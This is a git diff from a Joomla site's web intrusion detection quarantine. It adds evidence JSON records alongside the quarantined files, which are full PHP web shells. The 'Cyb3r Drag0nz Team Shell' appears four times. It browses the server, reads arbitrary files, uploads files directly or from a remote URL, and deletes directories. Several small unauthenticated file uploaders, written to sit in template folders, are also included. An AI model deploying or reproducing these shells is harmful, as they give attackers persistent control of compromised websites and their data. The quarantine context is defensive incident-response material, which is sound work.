a/var/www/hosting/archlinexp.eu/www/templates/beez3/f46vc3nzn1qw.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/templates/beez3/f46vc3nzn1qw.php.json.evidence.json new file mode 100644 index 0000000..b938dab --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/beez3/f46vc3nzn1qw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4981", + "log_excerpt": "[quarantine] www.archlinexp.eu:templates/beez3/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/templates/beez3/f46vc3nzn1qw.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353225, + "size": 10657, + "uid": 20043 + }, + "rel_path": "templates/beez3/f46vc3nzn1qw.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/templates/beez3/index.php.json b/var/www/hosting/archlinexp.eu/www/templates/beez3/index.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/beez3/index.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/templates/beez3/index.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/templates/beez3/index.php.json.evidence.json new file mode 100644 index 0000000..42eb361 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/beez3/index.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4982", + "log_excerpt": "[quarantine] www.archlinexp.eu:templates/beez3/index.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/templates/beez3/index.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783346966, + "size": 10657, + "uid": 20043 + }, + "rel_path": "templates/beez3/index.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/templates/f46vc3nzn1qw.php.json b/var/www/hosting/archlinexp.eu/www/templates/f46vc3nzn1qw.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/f46vc3nzn1qw.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/templates/f46vc3nzn1qw.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/templates/f46vc3nzn1qw.php.json.evidence.json new file mode 100644 index 0000000..e1529d7 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/f46vc3nzn1qw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4952", + "log_excerpt": "[quarantine] www.archlinexp.eu:templates/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/templates/f46vc3nzn1qw.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353223, + "size": 10657, + "uid": 20043 + }, + "rel_path": "templates/f46vc3nzn1qw.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/templates/protostar/f46vc3nzn1qw.php.json b/var/www/hosting/archlinexp.eu/www/templates/protostar/f46vc3nzn1qw.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/protostar/f46vc3nzn1qw.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/templates/protostar/f46vc3nzn1qw.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/templates/protostar/f46vc3nzn1qw.php.json.evidence.json new file mode 100644 index 0000000..de207da --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/protostar/f46vc3nzn1qw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4974", + "log_excerpt": "[quarantine] www.archlinexp.eu:templates/protostar/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/templates/protostar/f46vc3nzn1qw.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353224, + "size": 10657, + "uid": 20043 + }, + "rel_path": "templates/protostar/f46vc3nzn1qw.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/templates/protostar/index.php.json b/var/www/hosting/archlinexp.eu/www/templates/protostar/index.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/protostar/index.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/templates/protostar/index.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/templates/protostar/index.php.json.evidence.json new file mode 100644 index 0000000..3186354 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/protostar/index.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4975", + "log_excerpt": "[quarantine] www.archlinexp.eu:templates/protostar/index.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/templates/protostar/index.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783346963, + "size": 10657, + "uid": 20043 + }, + "rel_path": "templates/protostar/index.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_8kykulyz.php.json.json b/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_8kykulyz.php.json.json new file mode 100644 index 0000000..50f8749 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_8kykulyz.php.json.json @@ -0,0 +1,12 @@ + \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_8kykulyz.php.json.json.evidence.json b/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_8kykulyz.php.json.json.evidence.json new file mode 100644 index 0000000..053c380 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_8kykulyz.php.json.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4978", + "log_excerpt": "[quarantine] www.archlinexp.eu:templates/shaper_helix3/layout/uploader_8kykulyz.php.json.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_8kykulyz.php.json.json)", + "original_sha256": "23f19d3197130f4dd0420a9c51bcb774da4e341c25a7e7033733ba3eb7a4f5b0", + "original_stat": { + "gid": 30037, + "mtime": 1783741094, + "size": 308, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/layout/uploader_8kykulyz.php.json.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_g1jujsa9.php.json.json b/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_g1jujsa9.php.json.json new file mode 100644 index 0000000..57ecda4 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_g1jujsa9.php.json.json @@ -0,0 +1,41 @@ +{$_FILES['f']['name']}
"; + echo "Open"; + } else { + echo "❌ Failed to upload file."; + } +} else { + // 显示上传表单 + echo ' + + + File Uploader + + + +
+
✅ PHP 执行成功 - 此文件可被服务器解析
+

📤 File Uploader

+
+ +

+ +
+
Select a file and click Upload
+
+ + '; +} +?> \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_g1jujsa9.php.json.json.evidence.json b/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_g1jujsa9.php.json.json.evidence.json new file mode 100644 index 0000000..d94e516 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_g1jujsa9.php.json.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4980", + "log_excerpt": "[quarantine] www.archlinexp.eu:templates/shaper_helix3/layout/uploader_g1jujsa9.php.json.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_g1jujsa9.php.json.json)", + "original_sha256": "70eb6bc75669692e1867abe510b7087827fc771ce798ef11aee8d1c0a672c08f", + "original_stat": { + "gid": 30037, + "mtime": 1783743039, + "size": 1831, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/layout/uploader_g1jujsa9.php.json.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_q1z4oez8.php.json.json b/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_q1z4oez8.php.json.json new file mode 100644 index 0000000..88295e4 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_q1z4oez8.php.json.json @@ -0,0 +1,10 @@ +{$_FILES['f']['name']}
"; + echo "Open"; + } else { + echo "❌ Failed to upload file."; + } +} +?> \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_q1z4oez8.php.json.json.evidence.json b/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_q1z4oez8.php.json.json.evidence.json new file mode 100644 index 0000000..8c9fa82 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_q1z4oez8.php.json.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4977", + "log_excerpt": "[quarantine] www.archlinexp.eu:templates/shaper_helix3/layout/uploader_q1z4oez8.php.json.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_q1z4oez8.php.json.json)", + "original_sha256": "4c152a15582dde517989ca452df133a2308eeb4410eba39d7bf8d9f278db0a0b", + "original_stat": { + "gid": 30037, + "mtime": 1783741980, + "size": 313, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/layout/uploader_q1z4oez8.php.json.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_uwqytc5i.php.json.json b/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_uwqytc5i.php.json.json new file mode 100644 index 0000000..5c1c077 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_uwqytc5i.php.json.json @@ -0,0 +1,8 @@ + \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_uwqytc5i.php.json.json.evidence.json b/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_uwqytc5i.php.json.json.evidence.json new file mode 100644 index 0000000..0f3a5ae --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_uwqytc5i.php.json.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4979", + "log_excerpt": "[quarantine] www.archlinexp.eu:templates/shaper_helix3/layout/uploader_uwqytc5i.php.json.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_uwqytc5i.php.json.json)", + "original_sha256": "f0cdeea8d9cf8d5eaea2db8c3d42a9a1a475bacadee1bbf47bb5c1cf91233991", + "original_stat": { + "gid": 30037, + "mtime": 1783740124, + "size": 191, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/layout/uploader_uwqytc5i.php.json.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/50nnp2o4xt.php.json b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/50nnp2o4xt.php.json new file mode 100644 index 0000000..0d0bf2f --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/50nnp2o4xt.php.json @@ -0,0 +1,6 @@ +
+
\ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/50nnp2o4xt.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/50nnp2o4xt.php.json.evidence.json new file mode 100644 index 0000000..3c67200 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/50nnp2o4xt.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "7188", + "log_excerpt": "[quarantine] www.archlinexp.eu:templates/shaper_helixultimate/50nnp2o4xt.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/50nnp2o4xt.php.json)", + "original_sha256": "ad4e4ea904d90384d07ccb43d3f371bb03a5a647a997b991aeb4a8df6bc6dfe1", + "original_stat": { + "gid": 30037, + "mtime": 1784278959, + "size": 298, + "uid": 20043 + }, + "rel_path": "templates/shaper_helixultimate/50nnp2o4xt.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.json b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.json new file mode 100644 index 0000000..af5ab12 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.json @@ -0,0 +1,32 @@ +$target"; + } else { + echo "❈ Upload failed!"; + } + exit; +} +?> + + +Upload + +
+

📤 UPLOAD

+ +

+ +
